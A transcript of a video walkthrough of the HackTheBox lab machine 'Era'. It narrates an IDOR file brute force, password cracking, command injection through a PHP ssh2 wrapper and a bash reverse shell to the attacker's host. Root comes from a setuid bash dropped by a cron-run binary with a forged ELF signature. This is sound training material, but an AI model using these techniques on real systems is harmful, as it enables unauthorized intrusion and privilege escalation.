What's going on YouTube? This is Ipsec. I'm doing Era from HackTheBox. It starts off with finding an FTP web server and two web applications. One of the web applications has a file upload and download functionality, and there's no permission on the download. The only thing you need is the ID, so we brute force the ID and get two other documents. The signing keys, which comes in handy for the root step, and also a backup of the website. The backup also has the database, which contains some credentials, which we can use against the FTP server to discover a backup of the Apache config. And the website source code shows there is some functionality around PHP Wrappers. Looking at the Apache backup, we see the SSH PHP extension is installed, so we can use the SSH PHP wrapper to log into the box and run a command to get a reverse shell. The root step is around signing an ELF binary, but it's easier to show than explain, so let's just jump in. As always, we're going to start off with an nmap, so -sc for default scripts, sv enumerate versions, -vv for double verbose. This gives us things like the TTL, OA output all formats, put in the nmap directory and call it era, and then the IP address, which is 10.10.11.79. This can take some time to run, so I've already ran it. Looking at the results, we have just two ports open. The first one is FTP on port 21, and the banner is VSFTPD version 3.05. We also have HTTP on port 80. Its banner says it's Nginx running on Ubuntu, and is directing us over to era.htb. So let's go ahead and make sure this is in our host file. So sudo v etc host. Then we can add 10.10.11.79 era.htb. Save that. And let's see. The first thing we could poke at is FTP. I know nmap scripts would do anonymous authentication by default, but it's something I always just like checking, right? So let's just do FTP 10.10.11.79. I actually don't have the client on my computer. Let's do sudo apt search ftp, and this may pop up a lot of things. Let's see, is there anything that's obvious? FTP, it's like a client. Let's just try sudo apt install ftp. What's this do? Seems fine. So we're going to install this, and hopefully we will be able to just FTP into the server. There we go. I'm going to do anonymous, and it looks like it is going to fail. I know a lot of people, they always go to like search exploit, things like that. It's not a bad habit to have, but off the top of my head, I know there haven't been many exploits in VSFTPD for a very long time. For some reason, a lot of people see this banner and think it's going to be vulnerable because it was a very common vector in CTFs a long time ago, but that was like version 2, 3, 4. Generally, when I see version 3, I don't think any exploit, and 2, 3, 4 was released like in 2011, which is like 14 years ago. So I'm not going to spend too much time looking for vulnerabilities. If I ran into a big roadblock, I may go revisit that idea, but I want to go take a look at the website. So if I go to era.htb, we get a page. If I click around, we got services, about, portfolio, clients, team, contact, and the contact page, we do see a domain here. At this point, we can run a GoBuster. We can either look for hidden pages, or we could look for virtual host, right? Before we go pages, we should try to identify what type of service this is. If I do index.html, we get the page. If we try like PHP, we get a 404 not found. So I'm going to guess this is a static website. We could also look at the page source to see if anything sticks out, like things like WordPress, Drupal, things like that, but don't really see too much here. I'm just going to go and run a GoBuster. So we'll do a GoBuster, put it in virtual host mode, URL, HTTP, and what was this? Era.htb, the word list, opsec list, discovery, DNS, and I always like just using the subdomains top million, paste this. And I want to say we have to add like a DNS flag or something. vhost, does this say command options? We do URL. I guess we can try this. And let's see, it looks like it's working. So we're checking all these subdomains. We don't have a hit yet. And it doesn't look like we'll get one. I remember there being something funky that they changed in the latest version of GoBuster. I think it's this append domain flag. We see this is false. Let's just do that -h again. Let's see, is there something here? Append domain. Let's see. I think this is what we actually want. So let's add the --AD flag. And let's see. I think without that, it's just trying the word list as the whole virtual host. So when we add the append domain, it tries the word list dot the URL. So we get one domain. This is going to be file.error.htb. So without the append domain, it was just trying a request against file. We add the append domain and it changes, oh, let's go try file.error.htb. I think that should be default. Don't know why it isn't. Maybe it is in the latest and I haven't updated yet, but let's go ahead and add this to the host file. So we'll do file.error.htb, save this, and let's go take a look at what this page is. So we can do file error HTTP. Let's do HTTP, file error HTTP. And we get a page. Welcome to error storage. We have a few URLs. So if we click around, everyone goes to a sign-in page, and that is login.php. So we know we're on a PHP web server. We can also log in with security questions. So we have a username, mother's maiden name, pet, city. We could try like admin A, B, C and see if we log in. We get user not found. So we can have a way to brute force potential users. So if we do like error.htb, we have to do HTTP. Let's see. Did we have usernames on this? There was a contact. Let's see. Lancer, Jack, Catherine Maury. Let's see. There's a support. We could try a few things. If we wanted to, maybe K Maury as a username, ABC, user not found. Maybe just try Catherine, ABC, but kind of getting to a dead end here. One thing I would also try is seeing if this goes to like a API. There's normally sometimes like mass assignment type vulnerabilities. I may be classifying that wrong, but when you send a request in, if it goes to an API, this is much more likely. This looks like it may be hand jammed PHP just based upon this, meaning there's no framework or anything involved, right? But a lot of times when you use like PHP frameworks, there'll be quote unquote smart ways to handle data, right? And we're passing in username, answer 1, answer 2, answer 3. But maybe the framework would just accept other things. So if we did like ID is equal to 1, it may just accept that. And then we get a different error. Probably the security questions are incorrect, but we're still getting user not found. So it's not vulnerable to that, but that's also something I always test for. Is if we can change these parameters around. Maybe we don't need to know the username. We just change and say, hey, look at the ID instead. We may get in. But let's go take a look at what else there is. I always like having something go on in the background. So I'm going to start a GoBuster and we'll try to find hidden PHP scripts. So we'll do GoBuster directory mode, the URL HTTP, file error HTTP, word list, op, sec list, discovery, web content, raft, small words.txt. And then I'm going to add the PHP extension. Let's see. I don't know why this failed. It's saying everything is a 200. Is that true? Let's just go turn Burp Suite off. Like this. It looks like every page does actually get treated as a 200. Let's turn Burp back on. I just want to look at this behavior, see the exact request, intercept on, send it, repeater. So if we do this, we get a 200 page. There is probably a thing to blacklist the length. Please exclude response length. At this point, I'd probably actually just use like fuff or something like that, but let's go figure how to do this in GoBuster. Let's see, -XL. So we can add --XL, paste that length in, and there we go. We can start enumerating it. And we have a login.php, register PHP download. Download is redirecting us to login. There is a files. So let's go take a look at /files real quick to see what this looks like. So disable this, hit it, we get a forbidden. Let's see, let's try register.php. So let's go here, register, and it looks like we can create an account. Now, there is one stupid thing about this box. And it took me a pretty long time to realize what was happening. So I'm just going to say it, but if you register a password with password, it's not going to work because they did some anti SQL injection things that is really silly, but it's just filtering out strings. And OR is part of a SQL statement. So if you set the word password and you register an account, it will remove that and your password will be passwd. But you won't know that and you'll probably spend hours trying to figure that out. But that was annoying. I think I just put my password as A and that worked. Awesome. So now we're logged into the website. That note aside, let's see what we can do. We can potentially reset security questions. And oddly enough, it's asking me for a username. So I can just probably put any user I want. I'm kind of shocked it is asking the username. Upload files, manage files. So let's try upload files real quick. Let's just choose something. Readme.license. That sounds great to upload. And we get this ID. So let's see. We know there was a files. So if we do this /files, let's put HTTP there. We just uploaded readme. Was it license or MD? What did we actually upload? Refresh this page. Does it tell us what we uploaded? File was not uploaded. Manage. Readme.license. So forbidden still, so we can't access this file directly. Okay. I was wondering if potentially if we knew the file name, we could access it, but it does not look like that's the case. We could download it here. If we click this, it gives us a link and it looks like it's downloading off of the web server, right? So we do ID 986, DL is equal to true, and it looks like it gives us that download. Now I'm going to check for like I think it's IDOR vulnerabilities, but we're just going to brute force all these numbers, right? And the first thing I always like doing here, we can do and DL is true, that's fine. It's true, like that. There we go. It says we need authentication to hit this. So let's just do a curl and paste this in. And we don't get a file. We'll get a 302 redirecting us to login, I think. Where is the redirect? Yep, login.php. So we need to make sure when we brute force this, we pass in our cookie. And the easiest way to do this is just sending the whole request file to FUF. So let's go over to the proxy. We can clear this, refresh, get a new one, go to that tab. I'm going to copy to file, and I'm going to say, that's not actually what I want. We want this. There. So let's copy the file. And I'm going to say download.request. And now here we have download.request. So I'm going to edit this. And then we're just going to put fuzz and the parameter we want to fuzz, right? And this has everything with us, the PHP session ID, the user agent, things like that. Now, you could just tell FUF the cookie and then be done with it. But I always like just giving it the whole download request so it looks more like my browser is doing it. Things like this accept and user agent match up. So it just looks a little bit better. If I just passed in the straight cookie, then it would have FUF's default user agent, and that would definitely stand out. Maybe WAF like Cloudflare or something would block me. So best practice, I like just using the request. So we give it the request of download. And because this is not HTTPS, we have to do request proto HTTP because it defaults to HTTPS. And then the word list, we're going to do this funky thing. We do the caret parenthesis, and this is going to run the command and then treat it as a file. So we'll say, let's see, we were at 900 something. So let's just find everything from 0 to 1000. And we want to, let's see, we'll do hide words 3161. Filter words. There we go. And we have two IDs so far, 150, 54. We also have 986. 986 was the ID that we uploaded. So there's two files, 54 and 150. So let's see if we can download these. So if we know the file ID, does it let us download? We are still on Burp Suite, so we can just disable that real quick. Looks like we can. So we have site backup.zip. Let's save that. And then what was the other one? 150 something, right? Oh, just 150. Awesome. And we got signing.zip. So let's save both of these. And then we'll move, download, site backup here, and the signing. Let's see. Okay. I'm going to make a directory site backup, and then we will unzip it. Site backup. There we go. And it looks like we have all the files. Awesome. There is also a database, so that's going to be where I start. So let's do a SQLite on this. And we can say .schema, and this will give us the thing. So we have all the files, we have the users. So I'm going to just do select username, user, password from users. And then we have a list of all the users and passwords. So let's go ahead and save this. And then I'm going to go over to the Kraken so we can start cracking this. This is just a box I have on my network. You can run Hashcat on anything. I would recommend running on the host, not a VM, because if you run a VM, it's going to take a long time to crack anything. But let's do hashes. I'll call it era. Paste this in. And then I want to separate the usernames with a colon. That looks good. Save it. And let's do /hashcat. The word list, the hashes, then the word list will do rawq. Run this. It'll probably tell us the hash collides with a few things. Actually, it's going to tell us it doesn't match anything. We have to add the username flag to tell it. We passed in usernames in this. So here we go. It's telling us it conflicts. And the most common one is probably going to be this bcrypt. I have no idea, like nothing indicating this is form, CMS, or e-commerce. I always just try the standard bcrypt first. That's mode 3200 because that's what it's always been. I've never not shown that I had to choose that option. I don't know what software uses the other forms, but this is by far the most common. We get one crack already. That is America. And then we get Mustang. Let's see, how long is this going to take? Looking at it, we are, what percent are we? It's probably going to finish by the time I'm done talking. Oh no, we are nowhere near done. But those two cracked right away. I'm just going to end this, and then I'm going to do a show to see how far along or what those counts went to. So if we do --show, we can see Eric had America and Yuri had Mustang. If we go back to the nmap results, there wasn't any SSH. We do have FTP, so we can try that real quick. So we do FTP 10.10.11.179. Let's see. Do we have anything here? Do I have the wrong IP? Etsy host. 79, not 179. Let's try Eric. Permission denied. Okay, let's try Yuri. We get a password. We can try Mustang. And then we get logged in. And there is two files. We have apache2.conf and PHP 8.1. So let's get both of these. It failed to download it. PHP 8.1 conf. Failed to open file. Maybe I have to change the mode. Because I can definitely write in this directory. Make dir ftp chmod. Let's just make sure my FTP program's not doing something stupid. Let's go to this. Yuri. Mustang. Let's see. Using binary to transfer files. That should be fine. But everything is... I don't know what those zeros mean. Failed to open. Mode ASCII. Only support stream. Something's definitely going on here. think wget supports FTP. I'm just going to try something. Yuri Mustang at this / PHP 81 conf. No such file. I think I know what's going on. I think those are directories. I think I'm an idiot. The 00, that is, 4096 is the default size for a directory. Directory change successful. Wow. We can mgit star. This should download everything. So let's save all this. Let's go into the PHP. Do a dir. And there's a lot of files. Let's see. One thing sticks out. We have ssh.so, zip.so. This is all like the shared libraries of PHP. I'm not going to download this all, but we'll take note that this is not standard. And it is one of those tough things to notice. Maybe we should have started with like looking at the source code before going into this, but it is what it is. Let's see. So this is the Apache config for file error.htb. Nothing special there. Looking at this. Let's see. One thing I like doing to view this, let's grab everything that doesn't have a comment. Grep period. There we go. We can just see that file. That looks standard. We can do the same thing with Apache 2. Seeing if anything is interesting here. Don't see anything. And let's see. Actually, I was wondering, grep files on this? Nope. When we were getting the file error.htb / files, remember we got a error message 403 forbidden on everything we tried. I was trying to see if there was any of that configured in this, because that may indicate like there's a .ht access file or something. Then we could go, if we found a file disclosure vulnerability, we could go download that ht access, potentially get the password, and then that could be reused for something else, but I don't see anything there. So let's now turn our eyes over to the site backup. And looking at the files here, the thing that probably most stands out to me is going to be within the upload or download. If the upload is vulnerable, then we could potentially upload PHP files and get code execution that way. So let's see. If header is set to error valid, that should be fine. How are we uploading, or how are we choosing the file name? Let's see. Target directory is files, error base name, check for harmful patterns. So it's looking for a single quote or a double quote. Path extension, select star from files. Let's see, add file. Field. I do not see too much that stands out to me. I really just hate reading PHP code. There are so many weird functions here that make this not the most straightforward to read. Move uploaded files, up name, temp name, target file. I don't see anything, but also, let's see. I guess the biggest thing we test for is uploading a file with like a directory traversal, which we should have done before. Let's just try this real quick. So if we go back to upload file, we have readme license, and I want to intercept this request. Proxy, intercept on, upload, And what we want to do is put a // here and upload this file. It looks like the download worked. If we go to it, our download is ready. Looks like we can download the file. And let's see. README license. Is this now on the root server? It is not. So it looks like it did not save README license. I'm guessing when it writes a file to /files, it's going to be like a UUID or something like that. But I'm not seeing that with a quick glance at the code. If we look at how downloads work, let's see. We have if DL is equal to true, it sets these and then just does read file. And then we have this thing, beta, currently only available to the admin. And we have this show is equal to true, session error user is equal to 1. This is most likely going to be an admin check. And then it's letting us to do this weird thing. We're looking for a : / inside of format. And then if it is, we're doing an F open on it. So we're going to open the wrapper and then concatenate the file at the end of the wrapper. So it's essentially just looking for a PHP wrapper if we do this. So that would include like the most common would be PHP filter, convert base64, this thing. That's going to be the most common thing it's used for. That's a PHP wrapper. So let's go ahead and see if we can become an admin, right? If we go back to the database, it did tell us all the users, right? We have this admin underscore this unique name. I'm going to guess this is the admin. So let's go ahead and go back to our account. Let's see, we were logged in. We can just click update security questions. I'm going to do admin with this unique qualifier. We'll set the question ABC. If user exists, answers may have been updated. So let's now sign out. We signed out successfully. Log in with security questions. A, B, C. Log in. And now we have become an admin. And we can see the two files here. So now what we want to do is test this stream wrapper theory thing, right? So I'm going to do it with a PHP session. Or not PHP session, like the base64 wrapper, and we'll try to read etc passwd. So we want to go and grab download PHP, and I'm going to do 54 as the ID because we need the ID on it. Or the ID needs to be valid, I should say. So we send this here, and then there were some extra parameters it wanted us to add. So we do show is equal to true. So and show is equal to true. And what else do we need? Format. So we'll say format is equal to PHP : / filter convert dot base64 encode resource is equal to etc passwd. And it says opening this, and it fails. So what we want to do is probably upload a file called passwd because it's going to add this at the end. If we do an ID that doesn't exist, let's just do 1. We get like file not exist, right? Is it found? File not found, right? So we have to do a valid ID, but we can give it any file name we want. So I'm going to upload a file. We can turn Burp Suite off for a second. And let's just do touch passwd. Go here, upload. Let's do HTTP era passwd. Do this, upload it, and the ID is 8946. So again, the contents of the file doesn't matter. We're just using this ID because it pulls the name from the database and adds it to the very end of our query, right? So now I'm going to just do a resource is equal to etc. And we see, oh, it added files. That is annoying. Files passwd. So maybe we can't use this because it's always going to append files on it. That's weird. Let's see. I wonder what would happen if we did, let's just try one last thing. Intercept is on, upload, name, / passwd. So it appends files / passwd. There's no way this is going to work. But don't know if we don't try. File already exists. So I don't think we can really work around this. And even if we did, we're just reading source code. There are potentially other wrappers, and that's where the FTP came into play. If you looked at all the PHP modules, where's my FTP here, right? We were in the PHP configuration directory, and these are all the PHP modules that are installed. One of them being ssh2.so, and this is not a default one. We also have an FTP module, but if we go to Google, I'm going to turn Burp Suite off for this. Let's just Google this file name. And SSH2 is a dynamic shared object for the PHP SSH connection. And this is going to enable the PHP wrapper, I believe. Let's see. How do we use this? Resource types. SSH2. Here we go. So the whole logic step here would be if we look at this, let's see if we can find it real quick, right? So we go to download.php. We know, oh, we can do something with wrappers. Including files wasn't really that helpful. So if we look at what other wrappers are involved, maybe if we just click here, we have file, HTTP, FTP, PHP, zlib, data, glob, var, whatnot, right? If I think this is an outdated version of PHP, meaning it's not version beyond 8.1. So this would have to be multiple years old. I could probably just upload a .var file and then point the wrapper at the var file and have it execute code. However, that's not really a thing anymore. Now, if this was using Laravel, WordPress, things like that, there is a good chance we could get code execution, because how you get code execution with this file wrapper nowadays is you have to create an object and you have to reference that object in the code somewhere. But since this is all just PHP code, there are no objects we can just magically create. So if we did a grep, let's see, class it would be. This is all HTML, right? We're not creating any PHP classes, which means there's no PHP objects. So var deserialization is out of play, right? Expect, I've never seen this one on servers, and to be fair, I've never seen SSH2 on servers as well. But we saw that ssh.so file, so this is most likely going to be installed. And if we look at it, we can say ssh2 exec user pass URL, and then a command. So let's go see if this can work. So let's go ahead and copy that. And let's see. Go back here, go to repeater. And what we want to do is this, right? SSH2 exec. And then we had two credentials. Bear with me while I look for this. Yuri and Eric. I'm going to try Eric first, and we'll just see if we get any output. So we'll say Eric, password is America 127001, and then we do the command we want. So I'm just going to do a ping -c1 for count, and then we're going to ping my box, so 10.10.14.8. And I'm doing pluses for spaces because a space is not URL compliant. You have to use spaces there, or pluses. And now let's do sudo tcp dump -i ton0 -v icmp. So now we're looking for pings or ICMP traffic. We do this, it says opening resource ID 3, and we don't get anything. I'm going to add, let's see. Let's do a semicolon like that. And we get a ping. So what happened here? If we take that out, we get nothing. We add the semicolon, we get something. So what's happening here is, again, the command is doing that concat, right? If we go back here, it's doing this fopen to open the wrapper and then add the file on top of it, right? So that command, oh, it's telling us right here, files past WD. So without that semicolon, it's just treating this as part of it. So let's get rid of it again, right? This ping's not working because this is not an IP address. So yeah. So now we have a way to get pings working. Let's now do a reverse shell. So I'm going to do bash-c bash-i dev tcp 10.10.14.8 9001 0 and 1 like that. We need these quotes. Then we also want to URL encode the ampersands or the and signs because those are special characters. And then change the spaces with pluses. Do this. Okay. And then we also need to end this with a semicolon. So let's now try a nc lvnp 9001. Run this. And there we go. We have a shell. Awesome. So let's do python 3-c import pty spawn bin bash stty raw minus echo for ground it. And then we can export term is equal to xterm, and that will enable us to clear the screen. So the first thing I always check for is just general sudo rules. So we can do a sudo-l and see Erica may not run sudo on Era. We could also switch to potentially the Yuri user. Let's see if he exists. I think the password was Mustang. It looks like it was. Sudo-l Mustang. Yuri may not run it either. We could look at the two differences between these. If we look at Yuri, he's not in any groups. Eric is in devs. So there is one special group. We can also look for everything that look for other accounts on the box by doing a grep $. That's going to search for every line that ends in sh, and almost every shell like bash, zsh, csh, sh, they always end in sh. So that's why I do that. If we do that against etc past wd, we see there's only 2 users, Eric and Yuri. Well, 3 if you want to include root. But let's go see what this dev group can do. So I'm going to just do a find /-group devs, and let's hide error messages with that to dev null. So running this, we see there is this opt-av directory. So if we go in here, let's go periodic checks, lsla, we see there is a monitor file, and then status.log. And it looks like we have read-write over this file because that is part of groups. And if I cat status.log, it looks like it is just running this, right? So do lsla 2004. So maybe every single minute it runs. So what I'm going to do is let's do create a shell. V is not found. That is annoying. Nano dev shm. Let's call it shell.sh. We can say bin bash. Actually, we don't want a shell because this is being ran by a cron, right? So what I'm going to do is copy bin bash over to temp, and then we can do a chown root on this file. And then after that, we can say chmod 4755. That's going to add the set UID bit to this, letting us use this bash program to switch over to the root user. So we can save that. And let's now copy this file over top of monitor. And we probably should have backed up monitor first. I just forgot to do that. But I think that is good, right? So this is still having the permissions. If we look at it, it looks like it's going to run our script. Let's see, what is the current time? It is 6:08. If we tail status.log, we see an error. The first error is from object copy. And this is like object dump. If you ever ran this on a file, it just dumps all the sectors of a binary. It's saying the file format's not recognized because it's just a text file. There's no like file segments of this or whatever it's called. And then we get an error message saying executable is not signed. Tampering attempt detected, skipping. There are two ways we can process here because how the actual script is doing the detection isn't being done properly. I'm going to show the intended way first, and then we'll go jump and do the unintended. The intended way is just to create a ELF file and sign it, right? And as part of the FTP, we did download signing.zip. So let's just make the directory sign real quick. And then I'm going to unzip this signing.zip file. 7z, I forgot to do X to extract. And then we have the X509 thing to generate the key. And then the actual key itself. And this is going to be the signing key. And it looks like it has the public and private as well. So we have private key and certificate here. So it looks like it has both in this one file, right? So if we just made an ELF file and uploaded it, the signature would not match. We can do that real quick. Let's do make shell.c. Let's see. Let's include, what is it? The standard IO. Like that. And then let's do int main. And let's see. We can do set UID 0. And we have to set all the effective things. So we'll do set GID, set effective UID, set EGID. That should be right. So what this does, set our user and group to root, set our effective user and group to root, and then we want to run a system command. So we're just going to do the same thing we did before, copy bin bash over to temp, we'll call it shell, and then let's do a chmod 477, 4755 I think I did before. I don't know why that's my default thing, but we'll do that. And then before we do it, let's just make sure the owner is root. So chown root root, like that. There we go. And that should be good, right? Again, the reason we're doing this instead of just like system bash is because we're exporting a cron job. So if we just had this file drop us into a shell, well, we don't have access to that shell because it's being ran by a cron. So we're just going to copy a shell over to the temp directory and then give it the set UID permission to let us exploit it. So if we do a GCC shell, let's call this exploit. I'm going to call it the right name instead of typoing it. And let's just do a Python 3 HTTP server. Let's go over here. I think I could just wget, right? HTTP 10.10.14.8 8000 exploit. It's saved. If we move exploit over top of monitor, the permissions not owned by root anymore, or root devs. That should be fine. I probably should have done a copy command, but that is most likely fine. Let's do tail status log. You see no threats detected. We can do a -f, and we'll get that updated in a second. It's probably going to say signature does not match, right? So let's Google ELF sign binary while that goes on, and we see a GitHub repo. So let's go ahead and download this. There we go. Object copy can't dump the text signature. It doesn't exist. And then it says executable not signed. So if we go here, I think I can just make this libcrypto. I don't think we have all the libraries needed. This is going to be a pain. Hopefully this works. If not, then we're going to have to switch to Docker to build this, which I don't like doing, but we can. Let's see. Cannot open shared object file. libcrypto so11. I bet this is just using a different version of SSL or something. Let's see. Where is this error coming from? Let's try. Oh, this could be horrible. Okay. Let's just go ahead and start using Docker for this. So let's do a Docker run interactive. We'll delete this when it's done. And I'm going to mount my current directory inside of mount. And then let's run Ubuntu 20. I like always specifying a relatively old version of Ubuntu as my first chest, because when you create a binary, if you're running a newer version of libc, it won't run on older versions of libc. But if you have compile it on old versions of libc, it'll work for newer versions of libc normally. So now that we're in this container, let's go ahead and follow these instructions real quick. We'll probably want to do a apt update. Then we can install these. Apt update. Do this. Shouldn't take too long. Install. And I hope this has GCC by default. It does not. Apt install GCC. There we go. We probably have to do make as well or something. I doubt it's just going to have make file support, but maybe it does. Once this is done, let's go into our mount directory. Type make. Make file not found. Apt install make. This should work. There we go. It has now successfully compiled. Let's see. Do this. What do we call this directory? I think we were in sign. Then what was it? We can copy key.pem over to this. Copy our exploit over to this. And we have elf sign. We cannot open it. That's annoying, but we can run it here just fine. Elf sign. There we go. So hash algorithm. I'm just going to specify SHA-256 because that's the one that comes off the top of my mind. And then what was it? Key.pem. We'll do both. And then elf file was exploit. I'm going to call it monitor. I'm doing key.pem both because we saw it had both a private and public key in it. Hopefully the program's smart enough to use it. Let's see. Removing. It looks like it signed it. Let's go here. Do we have a monitor thing? We do. If I do object dump, monitor, let's see, is it -D? Let's see. Sign. We'll see if this works. Are we still listening on port 5000? Let's see, I don't think we are. We got to find my shell though. This is TCP dump. SSH. Here we go. So Python 3 -m HTTP server. And we will do let's do a curl now, HTTP 10.10.14.8, 8000 monitor. And I'll call this E for now. We'll do a CPE over top of monitor. And there we go. So now we have copied E on top of monitor. And this should be a signed file. If we look at the date, what time is it? 08. We probably just missed it, right? Status.log. We don't have any threats. If I do a ls/temp, oh, we do have a shell. So it may have actually ran. LSLA shell. We have this. It is not set UID, which is surprising, right? Yeah, it's just 755. Did I do like the owner afterwards? Let's take a look at this. Let's see, v shell.c. We do chown. This is stupid. What I did is I just forgot to put the file here. So the chown command failed. And because it failed, the and only proceeds on a success. So that's why chmod didn't run. So now we have to redo everything. So we can just do gcc shell. We'll call it exploit still. That is definitely the right one. So we can move exploit into this. And let's see, we can remove monitor. I'm just making sure this is the right one. So we can see the command we're running, chmod, temp shell. That looks good. So let's see, what do we want to do now? We need to sign it. So we removed monitor, sign. It's now signed. Curl. We have to start the HTTP server. Copy it. LSLA on temp. And we're waiting for this to become set UID. If we look at the date, it is 2520, so it's probably going to be about 40 seconds, right? Most likely. So let's just do a sleep 40, this, and I will resume the video when this is done. Okay, I have mentally counted 40 seconds and it is now done, and it's still not set UID. We should see like a capital S there. We're definitely screwing something up. I bet it's the set chmod command. The chown. Let's see, LSLA temp. It is owned by root. Did I not download the file? I'm just noticing 404. Curl. Strings monitor grep chmod. Strings e grep chmod. I think I just copied the 404. Yes, I did. Because this was not in the correct directory. Let's do a curl, cp, strings monitor, grep for chmod. This is definitely the right one. We have the chown root temp shell. In hindsight, we don't have to do this because this is already owned by root. So changing the owner is not doing anything. If we looked at it in temp, oh, it's already ran. Awesome. So let's just do temp shell -p. And there we go. The effective UID is root. So now we can just do cd/root and cat root.txt. So that is one way to do the box. There is a pretty funny unintended because it's not doing signature checking correctly. So let's see. I'm going to copy E. Let's just do it to our home directory and say correct.bin. That should work. So let's run a program called pspy. So let's do google.com, pspy, GitHub. And this is going to monitor just like new processes that get started on a box. It's something that's very, very, very handy to be running when you do these box and try to exploit crons, right? So let's go ahead and just wget it. Sure, this directory is fine. I don't feel like moving it to a correct one. And let's just go into our home directory, wget http 10.10.14.8 8000 pspy 64 chmod plus x on this, not with dub. There we go. And if we run this program, we will see the actual cron that gets ran that is checking the signature and doing everything, right? So it shouldn't take too long. I'm kind of surprised it's taking some time at all. I wonder if it kind of triggers when the file gets changed. Oh, there we go, probably. So let's see. Initiate monitoring. Do we have anything? Let's see. Bash, periodic, status. So right here, it's checking a certificate, I think. Maybe. I think this is just testing if the certificate is valid. There's one command that's missing that I saw when I did this myself. But one of the indications right here is this grep. It's just looking for a string inside of the binary, I think. Or not the binary. This is probably going to be the text section. Let's see if there's any new input. OBJ. It did not find it this go about. But the error message, this OBJ copy, it can't dump the section. We're not seeing OBJ copy being, oh, there we go. There it gets ran. So what it's doing here, it's dumping a section. It's dumping the text signature section. And this is what we use to sign the binary. And it's calling it text sig section.bin. And it's doing it out of the monitor binary. And then we look right here. I think we're just making sure the certificate, or what it dumped, is a certificate. And then this grep is just making sure the error inc string exists in the certificate. At no point do I see it actually doing any validation the certificate is correct, right? Normally when you sign a binary, the certificate also includes some hash of that file essentially that says this certificate is good for this binary. If the binary changes, then the certificate would no longer match. But because it's just using grep here, it doesn't look like it's actually performing the check correctly, right? So let's go ahead and run this command. This object copy. If I can, copy it real quick. Okay. So we can run this. And what that did was it created this text bin, right? So let's see. This elf binary signer. Exploit is not assigned to binary. So let's wget http 10.10.14.8 8000 exploit. So this text signature came from the monitor binary. What I'm going to do is use object copy to add a section called text signature. And then we're going to give it the text signature section from the monitor binary. And we're going to add that to exploit. And that is it. So let's do temp shell -p. Can I delete temp shell? Looks like I can. Awesome. So that doesn't exist anymore. I'm going to copy exploit over opt av periodic checks monitor cp. And then lsla temp. And this is going to exist probably within 60 seconds. And this is just because the program itself isn't really doing any checking, right? If we went back to the library where this elf signer is, it does give us code that we can use to create our own thing to test, right? Where is it? Dynamic linking, generate keys. There should be a way. Remove. Let's see. Bin utils. Elf sign. Read elf. It's doing this. Object dump. Let's talking about the layout. Generate keys. This isn't what I want. Huh. I swear I saw something on their page for validating. What if it's a test case? No. But we can see the shell is there. This is from that one binary. But we have to figure out a way to test the valid signature. Because normally when you sign a file, like you're signing it to say, hey, this is how you check the integrity of the file to make sure it hasn't been modified. Obviously, that's not happening. If we look at the initiate monitoring script, you can see the logic. Org check. So yeah, it checks the organization, it checks an email. But it's not actually checking the signature versus the binary. And this is going to be awkward. It's pretty much the end of the video. I was really expecting to be able to build something quickly to test the validity of the signature itself. I swear I saw something where you could import a library in C from this project, and it would give you a function that would test the signature, but I can't find it. And I look at the issues and things like that. Like I was like, maybe it was like an issue I had saw or came across, right? But if we look at all the closed issues, it's all in, I want to say this is, maybe that's Chinese, but I can't read any of this. And I went to like the repository. I was like, oh, there's a signer, there's a verify module. Oh, this is all a kernel module. Let's see, verify module, signer, sig verify. All this type of stuff appears to be like kernel modules and things like that. So I don't really know the correct way to do this. It is a very, very niche thing, so I'm not going to spend too much time digging into it. But yeah, that is the video. I guess we found out why it was so easy to bypass by just taking the signature out of one and putting it on top of another binary, because there's no good way for this library to actually validate it without using the kernel module, which is a thing in itself. So with that being said, that's going to be the video. Take care, everyone, and I'll see you all next time.